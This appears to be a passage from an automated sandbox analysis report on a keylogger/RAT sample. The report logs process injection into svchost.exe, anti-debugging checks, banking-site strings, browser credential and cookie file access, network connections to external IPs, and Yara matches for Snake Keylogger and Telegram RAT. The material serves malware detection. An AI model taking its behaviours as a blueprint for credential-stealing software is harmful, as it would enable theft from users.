Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_002B37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_002B37EF
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_002B3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_002B3B12
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_002BBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_002BBCBC

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

Code function: 0_2_002549A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_002549A0

Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599213	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598888	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598777	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598530	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598416	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597327	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597211	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597094	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596547	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596328	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595944	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595690	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595557	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595449	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595016	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594797	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594469	Jump to behavior

Source: svchost.exe, 00000002.00000002.4485919935.0000000006752000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: svchost.exe, 00000002.00000002.4485919935.0000000006752000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: svchost.exe, 00000002.00000002.4484036850.0000000003254000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll <add name="AspNetWindowsTokenRoleProvider" applicationName="/"
Source: svchost.exe, 00000002.00000002.4485919935.0000000006752000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: svchost.exe, 00000002.00000002.4485919935.00000000066F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: svchost.exe, 00000002.00000002.4485919935.00000000066F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: svchost.exe, 00000002.00000002.4485919935.00000000066F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: svchost.exe, 00000002.00000002.4485919935.00000000066F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: svchost.exe, 00000002.00000002.4485919935.0000000006752000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: svchost.exe, 00000002.00000002.4485919935.0000000006752000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: svchost.exe, 00000002.00000002.4485919935.00000000066F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: svchost.exe, 00000002.00000002.4485919935.0000000006752000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: svchost.exe, 00000002.00000002.4485919935.0000000006752000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: svchost.exe, 00000002.00000002.4485919935.00000000066F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: svchost.exe, 00000002.00000002.4485919935.00000000066F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: svchost.exe, 00000002.00000002.4485919935.00000000066F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: svchost.exe, 00000002.00000002.4485919935.00000000066F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: svchost.exe, 00000002.00000002.4485919935.0000000006752000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: svchost.exe, 00000002.00000002.4485919935.00000000066F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: svchost.exe, 00000002.00000002.4485919935.00000000066F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: svchost.exe, 00000002.00000002.4485919935.0000000006752000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: svchost.exe, 00000002.00000002.4485919935.0000000006752000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: svchost.exe, 00000002.00000002.4485919935.00000000066F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: svchost.exe, 00000002.00000002.4485919935.0000000006752000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: svchost.exe, 00000002.00000002.4485919935.00000000066F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: svchost.exe, 00000002.00000002.4485919935.00000000066F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: svchost.exe, 00000002.00000002.4485919935.0000000006752000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: svchost.exe, 00000002.00000002.4485919935.00000000066F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: svchost.exe, 00000002.00000002.4485919935.0000000006752000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: svchost.exe, 00000002.00000002.4485919935.00000000066F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: svchost.exe, 00000002.00000002.4485919935.0000000006752000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: svchost.exe, 00000002.00000002.4485919935.0000000006752000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: svchost.exe, 00000002.00000002.4485919935.0000000006752000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: svchost.exe, 00000002.00000002.4485919935.00000000066F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: svchost.exe, 00000002.00000002.4485919935.0000000006752000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: svchost.exe, 00000002.00000002.4485919935.00000000066F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: svchost.exe, 00000002.00000002.4485919935.0000000006752000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: svchost.exe, 00000002.00000002.4485919935.00000000066F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: svchost.exe, 00000002.00000002.4485919935.00000000066F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: svchost.exe, 00000002.00000002.4485919935.00000000066F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: svchost.exe, 00000002.00000002.4485919935.00000000066F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: svchost.exe, 00000002.00000002.4485919935.00000000066F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: svchost.exe, 00000002.00000002.4485919935.00000000066F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: svchost.exe, 00000002.00000002.4485919935.00000000066F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: svchost.exe, 00000002.00000002.4485919935.0000000006752000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: svchost.exe, 00000002.00000002.4485919935.00000000066F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: svchost.exe, 00000002.00000002.4485919935.00000000066F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: svchost.exe, 00000002.00000002.4485919935.0000000006752000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: svchost.exe, 00000002.00000002.4485919935.0000000006752000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: svchost.exe, 00000002.00000002.4485919935.00000000066F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: svchost.exe, 00000002.00000002.4485919935.0000000006752000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: svchost.exe, 00000002.00000002.4485919935.00000000066F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: svchost.exe, 00000002.00000002.4485919935.00000000066F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: svchost.exe, 00000002.00000002.4485919935.0000000006752000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: svchost.exe, 00000002.00000002.4485919935.0000000006752000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: svchost.exe, 00000002.00000002.4485919935.0000000006752000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: svchost.exe, 00000002.00000002.4485919935.0000000006752000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: svchost.exe, 00000002.00000002.4485919935.0000000006752000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: svchost.exe, 00000002.00000002.4485919935.0000000006752000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: svchost.exe, 00000002.00000002.4485919935.0000000006752000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: svchost.exe, 00000002.00000002.4485919935.0000000006752000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: svchost.exe, 00000002.00000002.4485919935.00000000066F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: svchost.exe, 00000002.00000002.4485919935.0000000006752000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Windows\SysWOW64\svchost.exe

API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_091E9578 LdrInitializeThunk,

2_2_091E9578

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

Code function: 0_2_002C3F09 BlockInput,

0_2_002C3F09

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

Code function: 0_2_00253B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00253B3A

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

Code function: 0_2_00285A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00285A7C

Source: C:\Windows\SysWOW64\svchost.exe

2_2_004019F0

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

Code function: 0_2_00254B37 LoadLibraryA,GetProcAddress,

0_2_00254B37

Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_0147D818 mov eax, dword ptr fs:[00000030h]	0_2_0147D818
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_0147EE78 mov eax, dword ptr fs:[00000030h]	0_2_0147EE78
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_0147EED8 mov eax, dword ptr fs:[00000030h]	0_2_0147EED8

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

Code function: 0_2_002A80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_002A80A9

Source: C:\Windows\SysWOW64\svchost.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_0027A124 SetUnhandledExceptionFilter,	0_2_0027A124
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_0027A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0027A155
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0040CE09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0040E61C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00416F6A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004123F1 SetUnhandledExceptionFilter,	2_2_004123F1

Source: C:\Windows\SysWOW64\svchost.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 158.101.44.242 80	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 149.154.167.220 443	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 188.114.96.3 443	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2DC1008

Jump to behavior

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

Code function: 0_2_002A87B1 LogonUserW,

0_2_002A87B1

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

Code function: 0_2_00253B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00253B3A

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

Code function: 0_2_002548D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_002548D7

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

Code function: 0_2_002B4C27 mouse_event,

0_2_002B4C27

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\BgroUcYHpy.exe"

Jump to behavior

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

Code function: 0_2_002A7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_002A7CAF

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

Code function: 0_2_002A874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_002A874B

Source: BgroUcYHpy.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: BgroUcYHpy.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

Code function: 0_2_0027862B cpuid

0_2_0027862B

Source: C:\Windows\SysWOW64\svchost.exe

Code function: GetLocaleInfoA,

2_2_00417A20

Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

Code function: 0_2_00284E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00284E87

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

Code function: 0_2_00291E06 GetUserNameW,

0_2_00291E06

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

Code function: 0_2_00283F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00283F3A

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

Code function: 0_2_002549A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_002549A0

Source: C:\Windows\SysWOW64\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000002.00000002.4484780955.00000000053A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 2.2.svchost.exe.7940f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7d00000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7940f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7940000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.3259f20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.3259000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.3259000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.3259f20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7940000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7d00000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4484159443.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5004, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 2.2.svchost.exe.7940f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7d00000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7940f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7940000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.3259f20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.3259000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.3259000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.3259f20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7940000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7d00000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4484159443.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5004, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

